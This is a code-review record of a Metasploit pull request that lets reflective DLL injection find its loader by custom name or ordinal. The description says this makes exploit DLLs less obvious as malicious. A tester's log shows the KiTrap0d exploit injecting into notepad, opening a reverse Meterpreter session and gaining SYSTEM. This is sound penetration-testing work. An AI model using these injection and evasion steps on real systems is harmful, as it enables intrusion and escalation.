### PR TITLE
Add support for custom name/ordinal for RDI

### PR DESCRIPTION
**Pull request by OJ**
Please land the Command ID PR before this one.

Most of the details of the changes for this PR can be found in the [Meterpreter PR](https://github.com/rapid7/metasploit-payloads/pull/401) so please take a look over there. That PR needs to lands before this.

The changes worthy of note here are that RDI now allows for a custom loader function name, or for an ordinal to be specified. It currently defaults to `ReflectiveLoader` because everything out there currently uses that. Over time, people can compile their own exploit DLLs with a loader that doesn't have a name (like we're now doing for Meterp) making it less obvious that it's a malicious asset.

# Verification

Do the things in the other PR first. Then:

- [ ] Spin up a session and use a few exploits that have RDI DLLs (eg. `KiTrap0d` and `bypassuac_injection`) and make sure they still work.

### CODE REVIEW

**Comment by OJ** [comment]
This stuff seems to come with changes in MSF master that haven't been pulled into 6.x yet. Sorry about that.

**Comment by bc0les** [comment]
That is't need in msf6

File: lib/msf/core/reflective_dll_loader.rb [hunk 1]
```diff
@@ -48,17 +52,26 @@ def load_rdi_dll_from_data(dll_data)
...
     pe = Rex::PeParsey::Pe.new(Rex::ImageSource::Memory.new(dll))
     offset = nil
 
-    pe.exports.entries.each do |e|
-      if e.name =~ /^\S*ReflectiveLoader\S*/
-        offset = pe.rva_to_file_offset(e.rva)
-        break
+    unless loader_name.nil?
+      pe.exports.entries.each do |e|
+        if e.name =~ /^\S*${loader_name}\S*/
```
Comment (smcintyre-r7) [inline lib/msf/core/reflective_dll_loader.rb:61]: I'm pretty sure this should be:

```suggestion
        if e.name =~ /^\S*#{loader_name}\S*/
```

Without that change my test case RDLL (which happens to use a ReflectiveLoader ordinal of 3) doesn't load.

File: lib/msf/core/reflective_dll_loader.rb [hunk 2]
```diff
@@ -48,17 +52,26 @@ def load_rdi_dll_from_data(dll_data)
...
+          offset = pe.rva_to_file_offset(e.rva)
+          break
+        end
       end
     end
 
+    # If we aren't able to find the ReflectiveLoader, we need to
+    # fallback to the knownn ordinal export for RDI DLLs?
```
Comment (smcintyre-r7) [inline lib/msf/core/reflective_dll_loader.rb:69]: Minor typo here in the comments.

```suggestion
    # fallback to the known ordinal export for RDI DLLs?
```

**Review by smcintyre-r7 — DISMISSED** [review]

File: lib/msf/core/reflective_dll_loader.rb (hunk 1 above)
Comment (smcintyre-r7) [reply lib/msf/core/reflective_dll_loader.rb:61]: Sorry, I should have provided more context here.

My test involved getting a 64-bit Meterpreter session on a Windows 7 SP1 system, and then running the `post/windows/manage/reflective_dll_inject` module. For that module, I specified the `PID` of a running calc process and the `PATH` was set to [this test case](https://github.com/zeroSteiner/reflective-polymorphism/releases/download/v1.1/ReflectivePolymorphism.v1.1.x64.dll) DLL. That test case DLL is reflectively loadable and it exports the `ReflectiveLoader` name, but the ordinal is 3 and not 1. On successful injection, the calc process should spawn a message box saying "Select OK to proceed." showing that the DLL was correctly injected.

**Comment by smcintyre-r7** [comment]
Now that the payloads side is landed and the payloads gem has been bumped to [v2.0.6](https://rubygems.org/gems/metasploit-payloads/versions/2.0.6), would you be able to update the gem file and rebase this? When I looked at merging it, there were quite a few conflicts. Thank you!

File: lib/msf/core/reflective_dll_loader.rb (hunk 1 above)
Comment (OJ) [reply lib/msf/core/reflective_dll_loader.rb]: Sorted!

File: lib/msf/core/reflective_dll_loader.rb (hunk 2 above)
Comment (OJ) [reply lib/msf/core/reflective_dll_loader.rb]: Thanks!

**Review by smcintyre-r7 — APPROVED** [review]

**Comment by smcintyre-r7** [comment]
Alright for my testing I used the same procedure I mentioned on the [payloads](https://github.com/rapid7/metasploit-framework) PR. In addition to that I tried a custom reflective DLL with the `post/windows/manage/reflective_dll_inject` module. I also tested KiTrap0d on an XP system.

* I fixed the export regex in commit 32fee4f09d315fcc824bdd6b7d4d90dd8e4ef56d, it still wasn't quite using the Ruby string interpolation syntax of `#{ }` and appeared to just be a typo
* I updated the payload cached sizes in commit 83bdb9297712bc616641a8819030eaa5bd4436fa

With that, I'm ready to land this. The Travis-CI build failures are due to the payload cached sizes being changed which is expected.

<details>
<summary>KiTrap0d Test</summary>

```
msf5 exploit(windows/local/ms10_015_kitrap0d) > show options 

Module options (exploit/windows/local/ms10_015_kitrap0d):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  -1               yes       The session to run this module on.


Exploit target:

   Id  Name
   --  ----
   0   Windows 2K SP4 - Windows 7 (x86)


msf5 exploit(windows/local/ms10_015_kitrap0d) > exploit

[*] Started reverse TCP handler on 192.168.250.87:4444 
[*] Launching notepad to host the exploit...
[+] Process 600 launched.
[*] Reflectively injecting the exploit DLL into 600...
[*] Injecting exploit into 600 ...
[*] Exploit injected. Injecting payload into 600...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175174 bytes) to 192.168.250.237
[*] Meterpreter session 3 opened (192.168.250.87:4444 -> 192.168.250.237:51048) at 2020-06-24 09:33:04 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
</details>

**Comment by smcintyre-r7** [comment]
# Release Notes
This changes the Reflective DLL injection capabilities used by Metasploit for payloads and exploits to resolve functions by either ordinal or name. This allows the framework to take advantage of recent payload updates that remove string names and instead resolve the necessary values by ordinal. The framework change are backwards compatible with Reflective DLLs that use the standard `ReflectiveLoader` name.

**Comment by OJ** [comment]
Woohoo! Thank you Spencer!

**Pull request merged**